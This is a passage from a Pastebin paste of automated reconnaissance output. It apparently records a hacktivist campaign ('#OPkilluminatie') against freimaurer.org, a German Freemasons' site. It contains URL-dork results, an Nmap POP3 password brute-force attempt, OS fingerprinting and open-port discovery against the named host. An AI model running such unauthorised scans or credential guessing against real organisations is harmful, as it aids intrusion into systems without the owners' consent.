  1338. |_[ + ] Information Server:: , , IP::0
  1339. |_[ + ] More details::
  1340. |_[ + ] Found:: UNIDENTIFIED
  1341. |_[ + ] ERROR CONECTION:: Could not resolve host: www.aasr.freimaurer.org
  1342.  
  1343. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1344. |_[ + ] [ 21 / 37 ]-[04:58:48] [ - ]
  1345. |_[ + ] Target:: [ http://freimaurer.org/en/freemasons-wiki/ ]
  1346. |_[ + ] Exploit::
  1347. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1348. |_[ + ] More details::
  1349. |_[ + ] Found:: UNIDENTIFIED
  1350.  
  1351. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1352. |_[ + ] [ 22 / 37 ]-[04:58:48] [ - ]
  1353. |_[ + ] Target:: [ http://freimaurer.org/freimaurerei/was-ist-freimaurerei/ ]
  1354. |_[ + ] Exploit::
  1355. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1356. |_[ + ] More details::
  1357. |_[ + ] Found:: UNIDENTIFIED
  1358.  
  1359. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1360. |_[ + ] [ 23 / 37 ]-[04:58:48] [ - ]
  1361. |_[ + ] Target:: [ http://freimaurer.org/vereinigte-grosslogen-von-deutschland/ ]
  1362. |_[ + ] Exploit::
  1363. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1364. |_[ + ] More details::
  1365. |_[ + ] Found:: UNIDENTIFIED
  1366.  
  1367. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1368. |_[ + ] [ 24 / 37 ]-[04:58:49] [ - ]
  1369. |_[ + ] Target:: [ http://freimaurer.org/en/freemasonry/what-is-freemasonry/ ]
  1370. |_[ + ] Exploit::
  1371. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1372. |_[ + ] More details::
  1373. |_[ + ] Found:: UNIDENTIFIED
  1374.  
  1375. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1376. |_[ + ] [ 25 / 37 ]-[04:58:49] [ - ]
  1377. |_[ + ] Target:: [ http://freimaurer.org/vereinigte-grosslogen-von-deutschland/gruendungsgeschichte/ ]
  1378. |_[ + ] Exploit::
  1379. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1380. |_[ + ] More details::
  1381. |_[ + ] Found:: UNIDENTIFIED
  1382.  
  1383. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1384. |_[ + ] [ 26 / 37 ]-[04:58:49] [ - ]
  1385. |_[ + ] Target:: [ http://freimaurer.org/en/united-grand-lodges-of-germany/ ]
  1386. |_[ + ] Exploit::
  1387. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1388. |_[ + ] More details::
  1389. |_[ + ] Found:: UNIDENTIFIED
  1390.  
  1391. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1392. |_[ + ] [ 27 / 37 ]-[04:58:50] [ - ]
  1393. |_[ + ] Target:: [ http://www.freimaurer.org/index.php/8-vgl-aktuell/7-ein-frohes-und-erfolgreiches-jahr-2015 ]
  1394. |_[ + ] Exploit::
  1395. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1396. |_[ + ] More details::
  1397. |_[ + ] Found:: UNIDENTIFIED
  1398.  
  1399. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1400. |_[ + ] [ 28 / 37 ]-[04:58:50] [ - ]
  1401. |_[ + ] Target:: [ http://freimaurer.org/vereinigte-grosslogen-von-deutschland/mitgliedsgrosslogen/?s= ]
  1402. |_[ + ] Exploit::
  1403. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1404. |_[ + ] More details::
  1405. |_[ + ] Found:: UNIDENTIFIED
  1406.  
  1407. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1408. |_[ + ] [ 29 / 37 ]-[04:58:51] [ - ]
  1409. |_[ + ] Target:: [ http://acgl.freimaurer.org/index.php/8-vgl-aktuell/19-deutsche-freimaurer-trauern-mit-der-bevoelkerung-von-belgien ]
  1410. |_[ + ] Exploit::
  1411. |_[ + ] Information Server:: , , IP::0
  1412. |_[ + ] More details::
  1413. |_[ + ] Found:: UNIDENTIFIED
  1414. |_[ + ] ERROR CONECTION:: Could not resolve host: acgl.freimaurer.org
  1415.  
  1416. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1417. |_[ + ] [ 30 / 37 ]-[04:58:51] [ - ]
  1418. |_[ + ] Target:: [ http://freimaurer.org/en/freemasonry/how-do-i-become-a-freemason/ ]
  1419. |_[ + ] Exploit::
  1420. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1421. |_[ + ] More details::
  1422. |_[ + ] Found:: UNIDENTIFIED
  1423.  
  1424. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1425. |_[ + ] [ 31 / 37 ]-[04:58:51] [ - ]
  1426. |_[ + ] Target:: [ http://freimaurer.org/vereinigte-grosslogen-von-deutschland/was-sind-die-vglvd/ ]
  1427. |_[ + ] Exploit::
  1428. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1429. |_[ + ] More details::
  1430. |_[ + ] Found:: UNIDENTIFIED
  1431.  
  1432. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1433. |_[ + ] [ 32 / 37 ]-[04:58:52] [ - ]
  1434. |_[ + ] Target:: [ http://275.freimaurer.org/index.php/8-vgl-aktuell/17-die-deutsche-freimaurerei-nimmt-anteil-je-suis-paris ]
  1435. |_[ + ] Exploit::
  1436. |_[ + ] Information Server:: , , IP::0
  1437. |_[ + ] More details::
  1438. |_[ + ] Found:: UNIDENTIFIED
  1439. |_[ + ] ERROR CONECTION:: Could not resolve host: 275.freimaurer.org
  1440.  
  1441. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1442. |_[ + ] [ 33 / 37 ]-[04:58:52] [ - ]
  1443. |_[ + ] Target:: [ http://freimaurer.org/en/united-grand-lodges-of-germany/member-grand-lodges/ ]
  1444. |_[ + ] Exploit::
  1445. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1446. |_[ + ] More details::
  1447. |_[ + ] Found:: UNIDENTIFIED
  1448.  
  1449. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1450. |_[ + ] [ 34 / 37 ]-[04:58:53] [ - ]
  1451. |_[ + ] Target:: [ http://freimaurer.org/en/united-grand-lodges-of-germany/the-founding-history/ ]
  1452. |_[ + ] Exploit::
  1453. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1454. |_[ + ] More details::
  1455. |_[ + ] Found:: UNIDENTIFIED
  1456.  
  1457. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1458. |_[ + ] [ 35 / 37 ]-[04:58:53] [ - ]
  1459. |_[ + ] Target:: [ http://freimaurer.org/en/united-grand-lodges-of-germany/what-are-the-vglvd/ ]
  1460. |_[ + ] Exploit::
  1461. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1462. |_[ + ] More details::
  1463. |_[ + ] Found:: UNIDENTIFIED
  1464.  
  1465. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1466. |_[ + ] [ 36 / 37 ]-[04:58:53] [ - ]
  1467. |_[ + ] Target:: [ http://freimaurer.org/en/united-grand-lodges-of-germany/member-grand-lodges/?s= ]
  1468. |_[ + ] Exploit::
  1469. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1470. |_[ + ] More details::
  1471. |_[ + ] Found:: UNIDENTIFIED
  1472.  
  1473. [ INFO ] [ Shutting down ]
  1474. [ INFO ] [ End of process INURLBR at [15-04-2018 04:58:53]
  1475. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1476. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-freimaurer.org.txt ]
  1477. |_________________________________________________________________________________________
  1478.  
  1479. \_________________________________________________________________________________________/
  1480.  
  1481. + -- --=[Port 110 opened... running tests...
  1482. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 04:58 EDT
  1483. Nmap scan report for freimaurer.org (80.237.132.155)
  1484. Host is up (0.57s latency).
  1485. Other addresses for freimaurer.org (not scanned): 2a01:488:42:1000:50ed:849b:ff7a:c9cb
  1486. rDNS record for 80.237.132.155: wp148.webpack.hosteurope.de
  1487.  
  1488. PORT STATE SERVICE VERSION
  1489. 110/tcp open pop3 Dovecot pop3d
  1490. | pop3-brute:
  1491. | Accounts: No valid accounts found
  1492. |_ Statistics: Performed 185 guesses in 190 seconds, average tps: 0.9
  1493. |_pop3-capabilities: STLS RESP-CODES USER PIPELINING CAPA SASL(PLAIN) TOP UIDL AUTH-RESP-CODE
  1494. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1495. Device type: WAP|general purpose
  1496. Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.4.X|2.6.X (93%)
  1497. OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6
  1498. Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Tomato 1.27 - 1.28 (Linux 2.4.20) (93%), Linux 2.6.18 - 2.6.22 (93%)
  1499. No exact OS matches for host (test conditions non-ideal).
  1500. Network Distance: 1 hop
  1501.  
  1502. TRACEROUTE (using port 443/tcp)
  1503. HOP RTT ADDRESS
  1504. 1 609.64 ms wp148.webpack.hosteurope.de (80.237.132.155)
  1505.  
  1506. #######################################################################################################################################
  1507.  
  1508. I, [2018-04-15T05:02:47.628415 #2783] INFO -- : Initiating port scan
  1509. I, [2018-04-15T05:06:32.343844 #2783] INFO -- : Using nmap scan output file logs/nmap_output_2018-04-15_05-02-47.xml
  1510. I, [2018-04-15T05:06:32.345269 #2783] INFO -- : Discovered open port: 80.237.132.155:80
  1511. I, [2018-04-15T05:06:36.339634 #2783] INFO -- : Discovered open port: 80.237.132.155:465
  1512. I, [2018-04-15T05:06:44.659116 #2783] INFO -- : Discovered open port: 80.237.132.155:993
  1513. I, [2018-04-15T05:06:50.472176 #2783] INFO -- : Discovered open port: 80.237.132.155:995
  1514. W, [2018-04-15T05:06:58.066274 #2783] WARN -- : Yasuo did not find any potential hosts to enumerate
  1515. #######################################################################################################################################
  1516. Anonymous JTSEC #OPkilluminatie full recon #17
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!